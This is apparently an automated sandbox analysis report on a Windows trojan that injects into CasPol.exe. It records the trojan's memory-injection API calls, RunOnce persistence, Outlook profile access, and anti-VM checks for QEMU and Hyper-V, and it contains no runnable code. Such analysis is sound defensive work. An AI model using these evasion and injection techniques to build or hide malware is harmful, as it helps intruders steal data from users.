            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_01088068
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_01082B18
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_0142AC50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_01426098
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_014252B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_01421D28
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_014244F8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_014232A8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_0156ED70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_0156E90B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_01561B90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_0156B6ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_01562AE8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_01567120
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_01560040
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_0156A3C8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_1C778C47
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_1C772570
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_1C775108
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_1C77B438
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_1D5B5E08
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_1D5B6AD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_1D5B46C4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_1D5B5D20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_1D5B5D80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_1D5B6AF1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 01006288 appears 52 times
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_0339FC0D NtProtectVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_033A00DF NtResumeThread,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_0110C3C8 NtAllocateVirtualMemory,
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14983490705.0000000002987000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameThrottlePlugin.dllL vs SecuriteInfo.com.Trojan.Inject.11626.exe
            Source: SecuriteInfo.com.Trojan.Inject.11626.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeSection loaded: edgegdi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: edgegdi.dll
            Source: SecuriteInfo.com.Trojan.Inject.11626.exeVirustotal: Detection: 11%
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeJump to behavior
            Source: SecuriteInfo.com.Trojan.Inject.11626.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeFile created: C:\Users\user\AppData\Local\Temp\nsl3FE3.tmpJump to behavior
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@8/13@1/2
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_004021AA CoCreateInstance,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_00404AB5 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6604:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6604:120:WilError_03
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeFile written: C:\Users\user\AppData\Local\Temp\HERMAPHRODEITY.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: SecuriteInfo.com.Trojan.Inject.11626.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: D:\SourceCode\GC3.Overclocking\production_V4.2\Service\ServiceSDK\Release\ThrottlePlugin\ThrottlePlugin.pdb source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14983490705.0000000002987000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.dr
            Source: Binary string: D:\SourceCode\GC3.Overclocking\production_V4.2\Service\ServiceSDK\Release\ThrottlePlugin\ThrottlePlugin.pdb00 source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14983490705.0000000002987000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.dr

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000001.00000002.14985940057.0000000003391000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.14824947099.0000000001100000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_70E230C0 push eax; ret
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_033939B0 pushad ; ret
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_03394D82 push ds; ret
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_03393DF7 push ebp; retf
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_70E21BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeFile created: C:\Users\user\AppData\Local\Temp\nsg40B0.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeFile created: C:\Users\user\AppData\Local\Temp\ThrottlePlugin.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Startup keyJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Startup keyJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Startup keyJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Startup keyJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeFile opened: C:\Program Files\qga\qga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\qga\qga.exe
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14986099860.0000000003481000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: NTDLLUSER32KERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 10.0; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLL
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14982548918.00000000007A6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXENZP
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14986099860.0000000003481000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14982251535.0000000000768000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7400Thread sleep time: -2767011611056431s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ThrottlePlugin.dllJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_0339213A rdtsc
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_01425260 smsw word ptr [eax]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 9933
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_0100F388 sgdt fword ptr [eax]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information queried: ProcessInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_0040290B FindFirstFileW,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_0040699E FindFirstFileW,FindClose,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeSystem information queried: ModuleInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeAPI call chain: ExitProcess graph end node
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeAPI call chain: ExitProcess graph end node
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14986495060.0000000004F59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14986099860.0000000003481000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ntdlluser32kernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\Microsoft.NET\Framework\v4.0.30319\caspol.exewindir=\syswow64\iertutil.dllwindir=\Microsoft.NET\Framework\v4.0.30319\caspol.exewindir=\syswow64\iertutil.dllwindir=\Microsoft.NET\Framework\v4.0.30319\caspol.exewindir=\syswow64\iertutil.dll
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14986495060.0000000004F59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14982548918.00000000007A6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exeNzP
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14986495060.0000000004F59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14986495060.0000000004F59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14986495060.0000000004F59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14986495060.0000000004F59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14986495060.0000000004F59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
            Source: CasPol.exe, 00000005.00000002.19734742085.000000000133A000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.19734954181.0000000001364000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.19734384547.00000000012FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14986099860.0000000003481000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14982251535.0000000000768000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
